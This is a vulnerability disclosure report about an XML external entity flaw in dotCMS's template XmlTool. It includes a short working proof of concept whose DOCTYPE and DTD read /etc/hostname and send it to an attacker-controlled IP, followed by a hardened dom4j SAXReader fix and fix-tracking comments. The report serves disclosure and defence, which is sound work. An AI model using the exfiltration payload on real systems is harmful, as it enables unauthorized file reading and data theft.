Improper Restriction of XML External Entity Reference in dotcms/core
Reported on
Dec 10th 2021
Description
Hello, dotCMS has an XXE vulnerability in the template design page. To exploit this flaw, an attacker needs the permission to edit and preview templates, and this can be abused to read internal files.
This section of the documentation explains how to use the XMLTool in the template engine, which allows us to write XML content directly to the application.
If we analyse the content of src\main\java\com\dotcms\rendering\velocity\viewtools\XmlTool.java on lines 156 to 158 we find the following code:
protected void parse(String xml) throws Exception {
    setRoot(DocumentHelper.parseText(xml));
}
If we analyse the documentation of dom4j (where the DocumentHelper class comes from) we find the following description of the parseText method:
Loading external DTD and entities is disabled (if it is possible) for security reasons.
I don't know exactly why this is disabled in your case (I am using your docker image), but it's vulnerable to XXE. I recommend using only SAXReader instead of depending on a volatile class / method.
Proof of Concept
#set($myXML = $xmltool.parse("<!DOCTYPE data SYSTEM 'http://172.27.32.51:1337/xxe.dtd'><data>&send;</data>"))
xxe.dtd
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://172.27.32.51:1337/?%file;'>">
%all;
Impact
File system read access
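The recommendation above is to stop relying on DocumentHelper.parseText() and drive a SAXReader with explicit hardening. The following is an added example of what such a replacement for XmlTool.parse(String) could look like; it is not dotCMS code, and the class name SafeXmlParser, the helper secureReader() and the two sample inputs in main() are constructed for illustration. It uses only public dom4j and SAX APIs, and it rejects any document that carries a DOCTYPE, since a template has no legitimate need for one.

```java
import java.io.StringReader;

import org.dom4j.Document;
import org.dom4j.DocumentException;
import org.dom4j.io.SAXReader;
import org.xml.sax.SAXException;

/**
 * Hardened replacement for the parse(String) method quoted in the report.
 * Added example, not dotCMS code: it builds its own SAXReader and turns off
 * every DTD / external-entity feature explicitly instead of trusting the
 * defaults that DocumentHelper.parseText() happens to get.
 */
public final class SafeXmlParser {

    private SafeXmlParser() {}

    /** Builds a SAXReader with XXE-relevant features disabled (hypothetical helper). */
    static SAXReader secureReader() throws SAXException {
        SAXReader reader = new SAXReader();
        // Reject any DOCTYPE outright: this alone blocks both external and
        // internal entity declarations.
        reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case the underlying parser ignores the feature above.
        reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
        reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        reader.setIncludeExternalDTDDeclarations(false);
        return reader;
    }

    /** Parses untrusted XML text; throws DocumentException if it carries a DOCTYPE. */
    public static Document parse(String xml) throws DocumentException {
        try {
            return secureReader().read(new StringReader(xml));
        } catch (SAXException e) {
            // A parser that cannot honour the hardening features must not be used at all,
            // which is exactly the "if it is possible" gap the dom4j docs leave open.
            throw new DocumentException("XML parser does not support secure features", e);
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: a harmless document, and one with an internal DTD subset.
        String benign = "<data><item>ok</item></data>";
        String withDoctype = "<!DOCTYPE data [<!ENTITY x \"y\">]><data>&x;</data>";

        System.out.println("benign root: " + parse(benign).getRootElement().getName());
        try {
            parse(withDoctype);
            System.out.println("UNEXPECTED: DOCTYPE was accepted");
        } catch (DocumentException e) {
            System.out.println("rejected DOCTYPE as intended: " + e.getMessage());
        }
    }
}
```

Failing closed in parse() matters as much as the feature list: the dom4j description quoted above disables external entities only "if it is possible", so a build where the features are silently unsupported is precisely the build that ends up exploitable. A quick check for the same class of issue elsewhere in a code base is to grep for DocumentHelper.parseText and bare new SAXReader() calls that are never followed by setFeature.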
Now there are 2 reports here; they have different root causes and different fixes.
I expect they are treated as different.
This is fixed here https://github.com/dotCMS/core/issues/21415
Hi Will, can I request a CVE for this flaw?
Vinicius, I would like to pay you an additional bounty for your good work with our system. Please email me at will@dotcms.com for more details. Thanks!
Thanks Will, I sent you an email.